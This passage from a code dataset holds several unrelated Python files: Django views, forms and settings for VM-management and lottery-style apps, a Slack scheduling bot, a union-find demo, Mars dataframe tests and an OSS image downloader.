no software work)'},\n ]\n actions = [\n {'Name': 'Quit', 'Letter': 'Q'},\n ]\n\n # Get selection\n selection = menu_select(\n 'Please select a setup mode',\n main_entries=mode_options,\n action_entries=actions)\n if selection.isnumeric():\n index = int(selection) - 1\n setup_mode = mode_options[index]['Name']\n elif selection == 'Q':\n abort()\n\n return setup_mode\n\n\ndef main():\n \"\"\"Main function.\"\"\"\n stay_awake()\n clear_screen()\n\n # Check installed OS\n check_os_and_abort()\n\n # Get setup mode\n setup_mode = get_mode()\n\n # Get answers to setup questions\n answers = get_answers(setup_mode)\n\n # Get actions to perform\n actions = get_actions(setup_mode, answers)\n\n # Perform actions\n for action, values in actions.items():\n kwargs = values.get('KWArgs', {})\n\n # Print info lines\n if values.get('Info', False):\n print_info(action)\n continue\n\n # Print disabled actions\n if not values.get('Enabled', False):\n show_data(\n message='{}...'.format(action),\n data='DISABLED',\n warning=True,\n )\n continue\n\n # Check Windows activation if requested\n if values.get('If not activated', False) and windows_is_activated():\n # Skip\n continue\n\n # Run function\n if values.get('Just run', False):\n values['Function'](**kwargs)\n else:\n result = try_and_print(\n message='{}...'.format(action),\n function=values['Function'],\n other_results=OTHER_RESULTS,\n **kwargs)\n\n # Wait for Ninite proc(s)\n if action == 'Ninite bundle':\n print_standard('Waiting for installations to finish...')\n try:\n for proc in result['Out']:\n proc.wait()\n except KeyboardInterrupt:\n pass\n\n # Pause\n if values.get('Pause', False):\n print_standard(values['Pause'])\n pause()\n\n # Show alert box for SecureBoot issues\n try:\n check_secure_boot_status(show_alert=True)\n except Exception: # pylint: disable=broad-except\n # Ignoring exceptions since we just want to show the popup\n pass\n\n # Done\n pause('Press Enter to exit... 
')\n\n\nif __name__ == '__main__':\n  try:\n    main()\n    exit_script()\n  except SystemExit as sys_exit:\n    exit_script(sys_exit.code)\n  except: # pylint: disable=bare-except\n    major_exception()\n","sub_path":".bin/Scripts/system_setup.py","file_name":"system_setup.py","file_ext":"py","file_size_in_byte":14532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"423630718","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nimport json\nimport datetime\nfrom .models import EvcloudVM, VMLimit, VMConfig\nfrom .utils import evcloud_operations\n\n# Create your views here.\n\ndef evcloud_list(request):\n    if request.method == \"GET\":\n        try:\n            vms = evcloud_operations()\n            image_list = vms.get_image_list()\n            image_list_dict = {}\n            for image in image_list.values():\n                image_list_dict[image['id']] = image['name'] + ' ' + image['version']\n        except:\n            pass\n        #image_list = ['centos7 64bit', 'win10 64bit', 'centos6 64bit', 'winxp 32bit', 'fedora28 64bit']\n        user = request.user\n        vm_list = EvcloudVM.objects.filter(user=user).filter(deleted=False).values()\n        vm_list_dict = {}\n        for i, vm in enumerate(vm_list):\n            try:\n                vm['vm_image_display'] = image_list_dict[int(vm['vm_image'])]\n            except:\n                vm['vm_image_display'] = '服务出错'\n            vm['created_time_display'] = vm['created_time'].strftime(\"%Y-%m-%d\")\n            vm['end_time_display'] = vm['end_time'].strftime(\"%Y-%m-%d\")\n            vm_list_dict[i] = vm\n        return render(request, 'evcloud_list.html', {'vm_list_dict':vm_list_dict})\n    elif request.method == \"POST\":\n        vms = evcloud_operations()\n        vm_id = request.POST.get('vm_id')\n        vm_operate = int(request.POST.get('vm_operate'))\n        if vm_operate == 4:\n            code, e = vms.delete(vm_id)\n            status = 'delete'\n            if code == 200:\n                vm = EvcloudVM.objects.get(vm_id=vm_id)\n                vm.deleted = True\n                vm.save()\n        elif vm_operate == 5:\n            code, e = vms.create_vnc(vm_id)\n            status = 'ok'\n        elif vm_operate == 6:\n            code, e = vms.get_status(vm_id)\n            status = 'ok'\n        elif 0 < vm_operate < 3:\n            code, e = vms.operations(vm_id, vm_operate)\n            status = '关机'\n        else:\n            code, e = vms.operations(vm_id, vm_operate)\n            status = '开机'\n        result = {\n            'code': code,\n            'status': status,\n            'e': e,\n        }\n        #print(e)\n        return JsonResponse(data=result)\ndef evcloud_add(request):\n    #print(request.method)\n    user = request.user\n    if request.method == \"GET\":\n        try:\n            vms = evcloud_operations()\n            image_list = vms.get_image_list()\n        except:\n            # image_list is undefined if get_image_list() failed; build a placeholder dict\n            image_list = {0: {'name': '服务出错'}}\n        config_list = VMConfig.objects.all().values()\n        config_list_dict = {}\n        for i, config in enumerate(config_list):\n            config_list_dict[i] = config\n        return render(request, 'evcloud_add.html', {'config_list_dict': config_list_dict,\n                                                    'image_list': image_list,\n                                                    })\n\n    elif request.method == \"POST\":\n        try:\n            limit = VMLimit.objects.get(user=user).limit\n        except:\n            VMLimit.objects.create(user=user)\n            limit = VMLimit.objects.get(user=user).limit\n        result = {}\n        image = int(request.POST.get('image'))\n        config_id = int(request.POST.get('configure'))\n        config = VMConfig.objects.get(id=config_id)\n        cpu = config.cpu\n        mem = config.mem\n        time = config.time * 30\n        try:\n            vm_number = EvcloudVM.objects.filter(user=user).filter(deleted=False).count()\n            if vm_number >= limit:\n                raise Exception('the number of VMs exceeds the limit')\n            vms = evcloud_operations()\n            create_result = vms.create(image, cpu, mem, user.email)\n            EvcloudVM.objects.create(vm_id=create_result['uuid'],\n                                     user=user,\n                                     end_time=datetime.datetime.now()+datetime.timedelta(days=time),\n                                     
EvcloudVM.objects.create(vm_id=create_result['uuid'],\n                                     user=user,\n                                     end_time=datetime.datetime.now()+datetime.timedelta(days=time),\n                                     vm_image=image,\n                                     vm_cpu=cpu,\n                                     vm_mem=mem,\n                                     vm_ip=create_result['ipv4'],\n                                     group_id=create_result['group_id'])\n            #print(create_result)\n            result['code'] = 200\n        except Exception as e:\n            result['code'] = 400\n            print(e)\n            result['error_text'] = str(e).encode('utf-8').decode('unicode_escape')\n        return JsonResponse(data=result)\n    else:\n        return JsonResponse(data={'code': 400, 'e': 'error'})","sub_path":"apps/evcloud/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"189611904","text":"# Union Find root method\ndef root(a, i):\n\t# Follow parent pointers until a self-parented root is reached.\n\twhile(a[i] != i):\n\t\ti = a[i]\n\treturn i\n\ndef find(a, u, v):\n\t# Two nodes are connected iff their roots coincide.\n\tif root(a, u) == root(a, v):\n\t\treturn True\n\treturn False\n\ndef union(a, u, v):\n\t# Merge the two sets by attaching one root to the other.\n\trootu = root(a, u)\n\trootv = root(a, v)\n\ta[rootu] = rootv\n\n# Each index starts out as its own parent (seven singleton sets).\nvertex = [0, 1, 2, 3, 4, 5, 6]\nedges = [(1, 0), (1, 3), (4, 6), (2, 6)]\nfor edge in edges:\n\tunion(vertex, edge[0], edge[1])\nprint(vertex)\nprint(find(vertex, 1, 5))","sub_path":"union_find_root.py","file_name":"union_find_root.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"129209431","text":"import sys\nimport datetime\nfrom slackbot.bot import respond_to, listen_to\nsys.path.append('..')\nfrom application.google_calendar import get_upcoming_events\nfrom find_avairable_time import get_available_time\n\n@listen_to('飲みにいける日')\n@listen_to('呑みにいける日')\n@listen_to('のみにいける日')\n@listen_to('ひまな日')\ndef respond_schedule(message):\n\n    calendar_ids = {'塩ホッケ': 'mchmng0grg5vb1q9pdahc2fui4@group.calendar.google.com',\n                    '大西': '9hsr2ngo831lbbq5pk52ujcicc@group.calendar.google.com',\n                    '耀太': 'sufgin9an1pmqgr6o24dks5q40@group.calendar.google.com'}\n    john_events = get_upcoming_events(calendar_id=calendar_ids['塩ホッケ'], max_results=100)\n    mary_events = get_upcoming_events(calendar_id=calendar_ids['大西'], max_results=100)\n    mike_events = get_upcoming_events(calendar_id=calendar_ids['耀太'], max_results=100)\n\n    min_time, max_time = datetime.time(18, 0), datetime.time(21, 0)\n    intervals = get_available_time(min_time, max_time, john_events, mary_events, mike_events)\n    free_list = []\n\n    for date in sorted(intervals.keys()):\n        for pair in intervals[date]:\n            start, end = pair\n            start_str = start.strftime('%m/%d %H:%M')\n            end_str = end.strftime('%m/%d %H:%M')\n            text = '\\r\\n' + start_str + \" ~ \" + end_str\n            free_list.append(text)\n\n    reply_schedule = ' '.join(free_list)\n    reply_message = '\\r\\n' + \"3人の都合が合う日はこれです\" + reply_schedule\n    message.reply(reply_message)\n\n@respond_to('おススメのお店')\n@respond_to('お勧めのお店')\n@respond_to('おススメの店')\n@respond_to('お勧めの店')\ndef respond_bar(message):\n    reply_message2 = \"日本酒好きが多いですね\" + \"\\r\\n\" + \"ここがおススメですよ\" + \"\\r\\n\" + \"https://tabelog.com/osaka/A2701/A270101/27080955/\"\n    message.reply(reply_message2)\n\n@respond_to('他のお店')\n@respond_to('他の店')\ndef respond_bar2(message):\n    reply_message3 = \"たまにはピザなんてどうですか?\" + \"\\r\\n\" + \"ここもおススメですよ\" + \"\\r\\n\" + \"https://tabelog.com/osaka/A2701/A270101/27092761/\"\n    message.reply(reply_message3)","sub_path":"application/plugins/slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"499736869","text":"# Copyright 1999-2018 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in 
compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pandas as pd\nimport numpy as np\n\nfrom mars.tests.core import TestBase\nfrom mars.dataframe.datasource.series import from_pandas as from_pandas_series\nfrom mars.dataframe.datasource.dataframe import from_pandas as from_pandas_df\n\n\nclass Test(TestBase):\n def testSeriesSum(self):\n data = pd.Series(np.random.rand(20), index=[str(i) for i in range(20)], name='a')\n sum_df1 = from_pandas_series(data).sum()\n self.assertEqual(data.sum(), sum_df1.execute())\n\n sum_df2 = from_pandas_series(data, chunk_size=6).sum()\n self.assertAlmostEqual(data.sum(), sum_df2.execute())\n\n sum_df3 = from_pandas_series(data, chunk_size=3).sum()\n self.assertAlmostEqual(data.sum(), sum_df3.execute())\n\n sum_df4 = from_pandas_series(data, chunk_size=4).sum(axis='index')\n self.assertAlmostEqual(data.sum(axis='index'), sum_df4.execute())\n\n data = pd.Series(np.random.rand(20), name='a')\n data[0] = 0.1 # make sure not all elements are NAN\n data[data > 0.5] = np.nan\n sum_df1 = from_pandas_series(data, chunk_size=3).sum()\n self.assertAlmostEqual(data.sum(), sum_df1.execute())\n\n sum_df2 = from_pandas_series(data, chunk_size=3).sum(skipna=False)\n self.assertTrue(np.isnan(sum_df2.execute()))\n\n sum_df3 = from_pandas_series(data, chunk_size=3).sum(skipna=False, min_count=2)\n self.assertTrue(np.isnan(sum_df3.execute()))\n\n sum_df4 = from_pandas_series(data, chunk_size=3).sum(min_count=1)\n self.assertAlmostEqual(data.sum(min_count=1), sum_df4.execute())\n\n sum_df5 = from_pandas_series(data, chunk_size=3).sum(min_count=21)\n self.assertTrue(np.isnan(sum_df5.execute()))\n\n def testDataFrameSum(self):\n data = pd.DataFrame(np.random.rand(20, 10))\n sum_df1 = from_pandas_df(data).sum()\n pd.testing.assert_series_equal(data.sum(), sum_df1.execute())\n\n sum_df2 = from_pandas_df(data, chunk_size=3).sum()\n pd.testing.assert_series_equal(data.sum(), sum_df2.execute())\n\n sum_df3 = from_pandas_df(data, chunk_size=6).sum(axis='index', numeric_only=True)\n pd.testing.assert_series_equal(data.sum(axis='index', numeric_only=True), sum_df3.execute())\n\n sum_df4 = from_pandas_df(data, chunk_size=3).sum(axis=1)\n pd.testing.assert_series_equal(data.sum(axis=1), sum_df4.execute())\n\n # test null\n np_data = np.random.rand(20, 10)\n np_data[np_data > 0.6] = np.nan\n data = pd.DataFrame(np_data)\n\n sum_df1 = from_pandas_df(data, chunk_size=3).sum()\n pd.testing.assert_series_equal(data.sum(), sum_df1.execute())\n\n sum_df2 = from_pandas_df(data, chunk_size=3).sum(skipna=False)\n pd.testing.assert_series_equal(data.sum(skipna=False), sum_df2.execute())\n\n sum_df3 = from_pandas_df(data, chunk_size=3).sum(min_count=15)\n pd.testing.assert_series_equal(data.sum(min_count=15), sum_df3.execute())\n\n sum_df4 = from_pandas_df(data, chunk_size=3).sum(min_count=3)\n pd.testing.assert_series_equal(data.sum(min_count=3), sum_df4.execute())\n\n sum_df5 = from_pandas_df(data, chunk_size=3).sum(axis=1, min_count=3)\n pd.testing.assert_series_equal(data.sum(axis=1, min_count=3), sum_df5.execute())\n\n sum_df5 = from_pandas_df(data, chunk_size=3).sum(axis=1, min_count=8)\n 
pd.testing.assert_series_equal(data.sum(axis=1, min_count=8), sum_df5.execute())\n\n # test numeric_only\n data = pd.DataFrame(np.random.rand(10, 10), index=np.random.randint(-100, 100, size=(10,)),\n columns=[np.random.bytes(10) for _ in range(10)])\n sum_df1 = from_pandas_df(data, chunk_size=2).sum()\n pd.testing.assert_series_equal(data.sum(), sum_df1.execute())\n\n sum_df2 = from_pandas_df(data, chunk_size=6).sum(axis='index', numeric_only=True)\n pd.testing.assert_series_equal(data.sum(axis='index', numeric_only=True), sum_df2.execute())\n\n sum_df3 = from_pandas_df(data, chunk_size=3).sum(axis='columns')\n pd.testing.assert_series_equal(data.sum(axis='columns'), sum_df3.execute())\n\n data_dict = dict((str(i), np.random.rand(10)) for i in range(10))\n data_dict['string'] = [str(i) for i in range(10)]\n data_dict['bool'] = np.random.choice([True, False], (10,))\n data = pd.DataFrame(data_dict)\n sum_df = from_pandas_df(data, chunk_size=3).sum(axis='index', numeric_only=True)\n pd.testing.assert_series_equal(data.sum(axis='index', numeric_only=True), sum_df.execute())\n\n","sub_path":"mars/dataframe/reduction/tests/test_reduction_execute.py","file_name":"test_reduction_execute.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"289834374","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom django.conf import settings\nfrom django.views.decorators.http import require_GET\nfrom future.utils import raise_with_traceback\n\nfrom luckyapi.logic.crowdfunding import (view_my_activitys_v2,\n view_other_activitys,\n view_activity_detail,\n view_activity_revealed,\n view_latest_activity,\n view_revealed_list)\nfrom luckycommon.sensor.sensor_handler import filter_apples, filter_gp\nfrom luckycommon.strategy import handler as strategy_handler\nfrom luckycommon.utils.api import token_required\nfrom luckycommon.utils.decorator import response_wrapper\nfrom luckycommon.utils.exceptions import (ParamError, AuthenticateError)\n\n_LOGGER = logging.getLogger('lucky')\n\nDEBUG_USER = settings.DEBUG_USER\n\n\n@require_GET\n@response_wrapper\ndef get_activity_detail(request, activity_id):\n \"\"\"\n get activity detail\n \"\"\"\n activity_detail = view_activity_detail(\n request.user_id, activity_id, use_cache=True)\n return activity_detail\n\n\n@require_GET\n@response_wrapper\ndef get_activity_revealed(request, activity_id):\n \"\"\"\n 查看商品的中奖信息\n \"\"\"\n activity_revealed = view_activity_revealed(activity_id)\n return activity_revealed\n\n\n@require_GET\n@response_wrapper\ndef get_latest_activity(request, template_id):\n \"\"\"\n 查看最新一期商品详情\n \"\"\"\n lite_only = int(request.GET.get('lite_only', 0))\n activity_detail = view_latest_activity(\n request.user_id, template_id, lite_only=lite_only)\n return activity_detail\n\n\n@require_GET\n@response_wrapper\ndef get_last_revealed(request, template_id):\n \"\"\"\n 往期揭晓\n get last winner of template\n \"\"\"\n try:\n page = int(request.GET.get('page', 0))\n size = int(request.GET.get('size', 0))\n except Exception as e:\n raise_with_traceback(ParamError(e))\n revealed_list, count = view_revealed_list(\n page, size, template_id, use_cache=True)\n data = {\n 'list': revealed_list,\n 'page': page if page > 0 else 1,\n 'size': len(revealed_list),\n 'total_count': count\n }\n return data\n\n\n@require_GET\n@response_wrapper\n@token_required\ndef get_my_activitys(request):\n \"\"\"\n 查看我的夺宝记录\n \"\"\"\n user_id = request.user_id\n if not user_id:\n raise 
AuthenticateError('not login')\n\n try:\n page = int(request.GET.get('page', 0))\n size = int(request.GET.get('size', 0))\n only_win = int(request.GET['win']) if request.GET.get('win') else 0\n status = int(request.GET['status']) if request.GET.get(\n 'status') else None\n except Exception as e:\n raise_with_traceback(ParamError(e))\n\n a_list, count = view_my_activitys_v2(user_id, page, size, only_win, status)\n data = {\n 'list': a_list,\n 'page': page if page > 0 else 1,\n 'size': size if size else count,\n 'total_count': count\n }\n return data\n\n\n@require_GET\n@response_wrapper\ndef get_other_activitys(request, user_id):\n \"\"\"\n 查看他人夺宝记录\n \"\"\"\n try:\n user_id = int(user_id)\n page = int(request.GET.get('page', 0))\n size = int(request.GET.get('size', 0))\n only_win = int(request.GET['win']) if request.GET.get('win') else 0\n status = int(request.GET['status']) if request.GET.get(\n 'status') else None\n except Exception as e:\n raise_with_traceback(ParamError(e))\n\n a_list, count = view_other_activitys(user_id, page, size, only_win, status)\n a_list = filter_apples(request, a_list)\n a_list = filter_gp(request, a_list)\n data = {\n 'list': a_list,\n 'total_count': count\n }\n return data\n\n\n@require_GET\n@response_wrapper\n@token_required\ndef get_activity_announce(request, activity_id):\n if request.user_id != DEBUG_USER:\n raise AuthenticateError()\n data = strategy_handler.fetch_announce_result(activity_id)\n return data\n","sub_path":"luckyapi/views/activity_v2.py","file_name":"activity_v2.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"132502933","text":"from django import forms\nfrom .models import Person, Project, Cost, Attachment, Horaire, Assignment, Time\n\n\n\nYEARS = [x for x in range(1980,2031)]\nYEAR_DATE = [x for x in range(2015,2031)]\n\n\nclass PersonForm(forms.ModelForm):\n class Meta:\n model = Person\n fields = [\n \"name\",\n \"name_short\",\n \"phone\",\n \"email\",\n \"IBAN\",\n \"birthday\",\n \"company\",\n \"company_short\",\n # \"country\",\n # \"city\",\n # \"zip_code\",\n # \"address\",\n # \"comment\",\n # \"agent\",\n # \"agent_short\",\n \"client\",\n \"model\",\n \"photographe\",\n \"make_up\",\n \"styling\",\n \"other\",\n \"comment_other\",\n # \"sedcard_cost\",\n # \"sedcard_payed\",\n # \"bank_account\",\n # \"website\"\n ]\n \n\nclass ProjectForm(forms.ModelForm):\n\n\n\n start = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Stardatum\")\n finish = forms.DateField(initial=\"2010-11-20\", widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Enddatum\")\n name = forms.CharField(required=True, widget=forms.TextInput(attrs={'class': 'special'}), initial=\"\", label=\"Projektname\")\n comment = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Komment\")\n other_description = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Anderer Beschreibung\")\n comment_address = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Adresskomment\")\n\n class Meta: \n model = Project\n fields = [\n 'name',\n 'client',\n 'start',\n 'finish',\n 'user',\n 'comment',\n 'sort',\n 'all_day',\n 'half_day',\n 'half_day_price_pro',\n 'all_day_price_pro',\n 'over_price_pro',\n 'all_in_price_pro',\n 'half_day_price_semipro',\n 'all_day_price_semipro',\n 'over_price_semipro',\n 
'all_in_price_semipro',\n            'country',\n            'city',\n            'zip_code',\n            'address',\n            'comment_address',\n            'honorary_base',\n            'honorary_plus',\n            'quantity_models_honorary_plus',\n            'ms_price',\n            'ms_hours',\n            'requirement_price',\n            'requirement_hours',\n            'requisiten_price_for_each_model',\n            'other_title',\n            'other_description',\n            'other_price',\n            'other_hours',\n            'photo_price',\n            'photo_hours',\n            'tax',\n            'statut'\n        ]\n\nclass CostForm(forms.ModelForm):\n    date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Datum\")\n    comment = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Komment\")\n\n    class Meta:\n        model = Cost\n        fields = [\n            'user',\n            'project',\n            'comment',\n            'date',\n            'amount',\n            'title',\n            'statut'\n        ]\n\nclass AttachmentForm(forms.ModelForm):\n    send_date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Senddatum\")\n    answer_date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Antwortdatum\")\n    comment_WG = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Komment wg\")\n    comment_client = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Komment kunde\")\n\n    class Meta:\n        model = Attachment\n        fields = [\n            'sort',\n            'file',\n            'send_date',\n            'answer_date',\n            'statut',\n            'comment_WG',\n            'comment_client',\n            'project',\n            'person'\n        ]\n\nclass HoraireForm(forms.ModelForm):\n    date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Datum\")\n    start_time = forms.TimeField(widget=forms.TimeInput(format='%I:%M %p',), label=\"Startdatum\")\n    finish_time = forms.TimeField(widget=forms.TimeInput(format='%I:%M %p',), help_text=\"Enter a date between now and 4 weeks (default 3).\", label=\"Endedatum\")\n\n    class Meta:\n        model = Horaire\n        fields = [\n            'assignment',\n            'date',\n            'start_time',\n            'finish_time'\n        ]\n\nclass AssignmentForm(forms.ModelForm):\n    comment_WG = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Komment\")\n    send_date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Senddatum\")\n    payment_date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Bezhaldatum\")\n\n    class Meta:\n        model = Assignment\n        fields = [\n            'project',\n            'person',\n            'model_type',\n            'travel_cost',\n            'hotel_cost',\n            'other_cost',\n            'comment_WG',\n            'statut',\n            'send_date',\n            'payment_date',\n            'total_price'\n        ]\n\nclass TimeForm(forms.ModelForm):\n    start_time = forms.TimeField(widget=forms.TimeInput(format='%I:%M %p',), label=\"Startdatum\")\n    finish_time = forms.TimeField(widget=forms.TimeInput(format='%I:%M %p',), label=\"Enddatum\")\n    date = forms.DateField(widget=forms.SelectDateWidget(years=YEAR_DATE), label=\"Datum\")\n    comment = forms.CharField(required=False, widget=forms.Textarea(attrs={\"rows\": 1, \"cols\": 22}), label=\"Komment\")\n\n    class Meta:\n        model = Time\n        fields = [\n            'title',\n            'user',\n            'comment',\n            'date',\n            'start_time',\n            'finish_time',\n            'project'\n        ]","sub_path":"apli/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"578727306","text":"#!/usr/bin/env python\n# file function: download the image files that match the given pid_type\nimport os\nimport 
oss2\nimport sys\nimport pymysql\n\nclass OSSImg(object):\n def __init__(self):\n self.auth = oss2.Auth()\n self.bucket = oss2.Bucket( )\n self.conn = pymysql.connect( )\n \n def _get_img_urls(self, type_top_id):\n qry = 'select thumb_pic from product where type_top_id=%s and thumb_pic is not null'\n type_id = int(type_top_id)\n with self.conn.cursor() as cur:\n cur.execute(qry, type_id)\n qry_res = cur.fetchall()\n # print(qry_res) qry_res is a tuple (('56371eb3f18ec.jpg',), ('562f9bc14301d.jpg',), ('f2682dbb918f4cc39a3a6acef43e0b49.jpg',), ('562fba096c1fd.jpg',), ('562f9dac2eceb.jpg',), ('bee07bef7c114af58ddd3064292482b1.jpg',))\n picture_urls = qry_res\n return picture_urls\n\n def get_img(self, url, i):\n # url = '772fe290e7c2496db9a132fb13b2c350.jpg'\n url_path = 'products/Thumbs/'+url\n save_name = str(i) + '_'+ url\n try:\n self.bucket.get_object_to_file(url_path, save_name)\n except:\n print('Error')\n\nif __name__ == '__main__':\n ossimg = OSSImg()\n typeid = sys.argv[1]\n picture_urls = ossimg._get_img_urls(typeid)\n for i in range(len(picture_urls)):\n url = picture_urls[i][0]\n print(url)\n ossimg.get_img(url,i)\n","sub_path":"vgg16_regular/get_pidtype_product_img.py","file_name":"get_pidtype_product_img.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"194803943","text":"# Django settings for cms project.\nimport os\nfrom django.core.exceptions import SuspiciousOperation\nsettings_dir = os.path.dirname(__file__)\nSETTINGS_DIR = settings_dir\nROOT_DIR = os.path.join(\n os.path.abspath(\n os.path.join(SETTINGS_DIR, os.path.pardir),\n ),\n)\n\nMEDIA_URL = 'http://palewire.s3.amazonaws.com/'\nADMIN_MEDIA_PREFIX = 'http://palewire.s3.amazonaws.com/admin/'\nSTATIC_URL = '/static/'\n\ntry:\n from settings_dev import *\nexcept ImportError:\n from settings_prod import *\nTEMPLATE_DEBUG = DEBUG\n\nTIME_ZONE = 'America/Los_Angeles'\nUSE_TZ = False\nLANGUAGE_CODE = 'en-us'\nSITE_ID = 1\nUSE_I18N = True\n\nMEDIA_ROOT = os.path.join(ROOT_DIR, 'media')\nSTATIC_ROOT = os.path.join(ROOT_DIR, 'static')\n\nCACHE_BACKEND =\t'memcached://127.0.0.1:11211'\nCACHE_MIDDLEWARE_SECONDS = 60 * 5\nCACHE_MIDDLEWARE_KEY_PREFIX = ''\nCACHE_MIDDLEWARE_ANONYMOUS_ONLY = True\n\nHAYSTACK_SITECONF = 'coltrane.search_indexes'\nHAYSTACK_SEARCH_ENGINE = 'whoosh'\nHAYSTACK_WHOOSH_PATH = '/apps/palewire.com/whoosh/'\n\nMUNIN_ROOT = '/var/cache/munin/www/'\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.gzip.GZipMiddleware',\n 'toolbox.middleware.domains.MultipleProxyMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'toolbox.middleware.domains.DomainRedirectMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n)\n\nROOT_URLCONF = 'project.urls'\n\nTEMPLATE_DIRS = (\n os.path.join(ROOT_DIR, 'templates/'),\n)\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nSTATICFILES_DIRS = (\n os.path.join(ROOT_DIR, 'templates/static/'),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n 
\"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.core.context_processors.request\",\n \"django.contrib.messages.context_processors.messages\",\n \"django.core.context_processors.csrf\",\n \"toolbox.context_processors.sites.current_site\",\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.admin',\n 'django.contrib.comments',\n 'django.contrib.sitemaps',\n 'django.contrib.humanize',\n 'django.contrib.staticfiles',\n # Blog\n 'coltrane',\n 'bona_fides',\n # Site extras and helpers\n 'correx',\n 'tagging',\n 'django_extensions',\n 'greeking',\n 'shortener',\n 'south',\n 'adminsortable',\n # NICAR-related apps\n 'nicar.polls',\n 'nicar.flu_map',\n # Goofy one-off apps\n 'wxwtf.questionheds',\n 'wxwtf.random_oscars_ballot',\n 'wxwtf.flushots',\n 'wxwtf.kennedy',\n)\n\n# Shortener settings\nSITE_NAME = 'palewi.re'\nSITE_BASE_URL = 'http://%s/!/' % SITE_NAME\n\n\ndef skip_suspicious_operations(record):\n if record.exc_info:\n exc_value = record.exc_info[1]\n if isinstance(exc_value, SuspiciousOperation):\n return False\n return True\n\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n },\n 'skip_suspicious_operations': {\n '()': 'django.utils.log.CallbackFilter',\n 'callback': skip_suspicious_operations,\n },\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler',\n 'filters': ['require_debug_false', 'skip_suspicious_operations'],\n },\n 'null': {\n 'level':'DEBUG',\n 'class':'django.utils.log.NullHandler',\n },\n 'console':{\n 'level':'DEBUG',\n 'class':'logging.StreamHandler',\n 'formatter': 'verbose'\n },\n 'logfile': {\n 'level':'DEBUG',\n 'class':'logging.handlers.RotatingFileHandler',\n 'filename': os.path.join(settings_dir, 'django.log'),\n 'maxBytes': 50000,\n 'backupCount': 2,\n 'formatter': 'verbose',\n },\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s|%(asctime)s|%(module)s|%(process)d|%(thread)d|%(message)s',\n 'datefmt' : \"%d/%b/%Y %H:%M:%S\"\n },\n 'simple': {\n 'format': '%(levelname)s|%(message)s'\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'coltrane': {\n 'handlers': ['console', 'logfile'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n 'wxwtf': {\n 'handlers': ['console', 'logfile'],\n 